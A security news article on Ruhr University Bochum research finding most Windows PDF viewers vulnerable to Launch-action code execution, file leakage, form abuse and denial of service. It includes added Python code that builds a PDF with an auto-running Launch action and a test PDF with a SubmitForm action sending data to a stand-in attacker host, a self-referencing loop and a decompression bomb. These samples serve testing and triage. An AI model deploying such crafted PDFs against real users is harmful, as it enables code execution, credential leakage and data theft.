
Pwnable Document Format: Windows PDF viewers outperformed by browser, macOS, Linux counterparts

The vast majority of the most popular Windows-native PDF viewers were vulnerable to multiple attack techniques exploiting standard PDF features, a team of security researchers has discovered.

Several PDF software brands were vulnerable to the most serious attacks, which resulted in local file leakage, file write access, and remote code execution (RCE), academics from Ruhr University Bochum in Germany found.

PDF viewers built into leading web browsers and applications for macOS and Linux were only susceptible to comparatively trivial attacks such as denial of service (DoS).

The viewers incorporated into Safari and Edge, meanwhile, were the only applications among 28 tested to resist all exploits, which targeted features that “directly or indirectly allow access to a file handle”, as a blog post explains.

Susceptible to eight of 10 attack techniques, the worst culprits overall were PDF-Xchange Viewer and PDF-Xchange Viewer for Windows.

PDFelement and iSkysoft, prone only to DoS, were honorable exceptions to the otherwise unimpressive Windows scorecard.

‘Code execution by design’

“I was surprised how many viewers did straightforwardly implement ‘code execution by design’ – because they simply followed the PDF reference and thereby introduced a dangerous feature (the ‘Launch action’) without, [for example], correctly asking the user for confirmation,” Jens Müller, one of the researchers, told The Daily Swig.

The blog post describes how, in six of the 18 Windows viewers probed, a Launch action could run a malicious file that is “specified by a local path, a network share, a URL, or a file embedded within the PDF document itself”.
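To see concretely what the “code execution by design” problem looks like, the following added example (written for this page, not code from the researchers or the article) builds the smallest PDF that carries a Launch action as its OpenAction, exactly as PDF 32000-1:2008 section 12.6.4.5 defines it. Feed the output to a viewer and observe whether it prompts before launching anything; a viewer that silently runs the target is the behaviour the research criticises. The target path and the file name are placeholders chosen here, not payloads from the paper.

```python
"""Build a minimal PDF whose OpenAction is a Launch action.

Added example for testing how a viewer handles the feature described
above; it is not code from the research or the article.  The launched
target is a harmless placeholder path, not a payload.
"""
import re


def _pdf_string(s: str) -> str:
    # Escape the characters that are special inside a PDF literal string.
    return "(" + s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)") + ")"


def build_launch_pdf(target: str, params: str = "") -> bytes:
    """Return PDF bytes with one empty page and an OpenAction /Launch.

    target: the file to launch.  The spec allows a local path, a UNC share
            or a URL here, which is why a viewer must prompt before acting.
    params: optional /P command-line parameters (Windows-specific in the spec).
    """
    launch = f"<< /S /Launch /F {_pdf_string(target)}"
    if params:
        launch += f" /P {_pdf_string(params)}"
    launch += " >>"
    objects = [
        "<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        "<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        "<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        launch,
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                      # byte offset for the xref table
        out += f"{num} 0 obj\n{body}\nendobj\n".encode("latin-1")
    xref_pos = len(out)
    out += f"xref\n0 {len(objects) + 1}\n".encode()
    out += b"0000000000 65535 f \n"                   # each xref entry is exactly 20 bytes
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()
    out += (f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\n"
            f"startxref\n{xref_pos}\n%%EOF\n").encode()
    return bytes(out)


def launch_targets(pdf: bytes) -> list[str]:
    """Triage helper: the /F targets of Launch actions found in raw PDF bytes.

    Only handles literal strings written the way build_launch_pdf writes them
    (no escaped parentheses, no hex strings, no object streams).
    """
    hits = re.finditer(rb"/S\s*/Launch\b[^>]*?/F\s*\(([^)]*)\)", pdf)
    return [m.group(1).decode("latin-1").replace("\\\\", "\\") for m in hits]


if __name__ == "__main__":
    # Placeholder target: a benign system binary, assumed for illustration.
    data = build_launch_pdf(r"C:\Windows\System32\notepad.exe")
    with open("launch-test.pdf", "wb") as fh:
        fh.write(data)
    print(launch_targets(data))
```

The same document with a UNC path (`\\host\share\file.exe`) as the target is how the network-share variant in the quote above is expressed, and resolving that path is also what can leak NTLM credentials from a Windows host.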

Information disclosure attacks, meanwhile, could be used to track PDF document use “by silently invoking a connection to the attacker’s server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker”.

The most dangerous technique, successfully deployed against three Windows viewers and partially successful against another three, exploited various methods defined by the PDF standard for embedding external files or accessing files on the host’s file system.

“If a malicious document managed to firstly read files from the victim’s disk and secondly, send them back to the attacker, such behavior would arguably be critical,” reads the blog post.

Data manipulation attacks

Data manipulation attacks involved silently modifying form data, displaying different content depending on which application opened the document, and abusing the form-submission mechanism the PDF standard provides for sending form data to external web servers in order to write to local files on the host’s file system instead.

The researchers successfully executed one or both DoS techniques against every application except the Safari and Edge viewers. One technique exploits document elements that reference themselves or one another to send the parser into an infinite loop; the other is a variant of the ‘zip bomb’ in which the heavily compressed payload sits in PDF stream objects rather than in a zip archive.
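The information disclosure, data manipulation and denial-of-service classes above all leave static traces in the file, so they can be triaged before a document is ever opened. The following added example (written for this page, not code from the paper) scans raw PDF bytes for action dictionaries that reach outside the document, for compressed streams whose expansion ratio looks like a decompression bomb, and for objects that reference themselves. The action list, the bomb ratio and the inflation cap are this example's own choices, and the sample document is constructed inline for testing.

```python
"""Static triage of a PDF for the feature classes discussed above.

Added example, not code from the research.  The RISKY_ACTIONS list, the
BOMB_RATIO threshold and PROBE_LIMIT are assumptions chosen here.
"""
import re
import zlib

# Action types that can contact a server, reach the file system or run code.
RISKY_ACTIONS = (b"Launch", b"URI", b"SubmitForm", b"GoToR", b"ImportData", b"JavaScript")
BOMB_RATIO = 500                # assumed: expanded bytes / compressed bytes
PROBE_LIMIT = 4 * 1024 * 1024   # never inflate more than this per stream

_OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def find_actions(pdf: bytes) -> list[str]:
    """Names of risky action types present, e.g. ['Launch', 'SubmitForm']."""
    return [name.decode() for name in RISKY_ACTIONS
            if re.search(rb"/S\s*/" + name + rb"\b", pdf)]


def flate_bomb_streams(pdf: bytes) -> list[tuple[int, float]]:
    """(object number, ratio) for FlateDecode streams at or above BOMB_RATIO.

    Inflation is capped at PROBE_LIMIT so the scanner cannot itself be bombed;
    when the cap is hit the reported ratio is a lower bound.
    """
    hits = []
    for m in _OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        if b"/FlateDecode" not in body:
            continue
        s = _STREAM_RE.search(body)
        if not s:
            continue
        raw = s.group(1)
        try:
            out = zlib.decompressobj().decompress(raw, PROBE_LIMIT)
        except zlib.error:
            continue                      # corrupt stream: not our concern here
        ratio = len(out) / max(len(raw), 1)
        if ratio >= BOMB_RATIO:
            hits.append((num, round(ratio, 1)))
    return hits


def self_referencing_objects(pdf: bytes) -> list[int]:
    """Objects whose dictionary holds an indirect reference to themselves,
    e.g. a /Pages node listing itself in /Kids, which loops a naive tree walk."""
    hits = []
    for m in _OBJ_RE.finditer(pdf):
        num, gen, body = m.group(1), m.group(2), m.group(3)
        dictionary = body.split(b"stream", 1)[0]      # ignore binary stream data
        if re.search(rb"\b" + num + rb"\s+" + gen + rb"\s+R\b", dictionary):
            hits.append(int(num))
    return hits


def triage(pdf: bytes) -> dict:
    return {
        "actions": find_actions(pdf),
        "flate_bombs": flate_bomb_streams(pdf),
        "self_refs": self_referencing_objects(pdf),
    }


def sample_pdf() -> bytes:
    """Constructed test document (not from the paper): a self-referencing
    /Pages node, a SubmitForm action pointing at an assumed attacker host,
    and a FlateDecode stream that inflates 1 MB of zeros from ~1 KB."""
    bomb = zlib.compress(b"\0" * 1_000_000, 9)
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [2 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /S /SubmitForm /F (http://attacker.example/collect) /Flags 4 >>\nendobj\n",
        b"4 0 obj\n<< /Length " + str(len(bomb)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + bomb + b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    print(triage(sample_pdf()))
```

This is a first-pass filter, not a parser: it does not look inside object streams or decode hex strings, so a document that hides its action dictionaries in a compressed object stream passes it. The point it demonstrates is that the dangerous behaviours in this research are ordinary, spec-defined features that a viewer can (and several did) honour without asking; whether to trust a file should be decided before the viewer gets it.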

‘A better choice’

Müller said the “more severe issues should be fixed by now”, while “less impactful issues such as form modification are basically features”, and will therefore not likely be remedied.

He suggests that applications built into browsers, which offer sandboxing protections, “may be a better choice for a suspicious document than a native third-party PDF viewer”.


The research also highlights an education gap around the risks posed by what Müller refers to as “a quite complex data format with tons of interesting features”.

“For example, people are aware that Office files (e.g in email attachments) can contain macros, but public knowledge of similar functionality in PDF documents is less widespread,” he noted.

The other researchers involved are Dominik Noss, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

Source: https://portswigger.net/daily-swig/pwnable-document-format-windows-pdf-viewers-outperformed-by-browser-macos-linux-counterparts
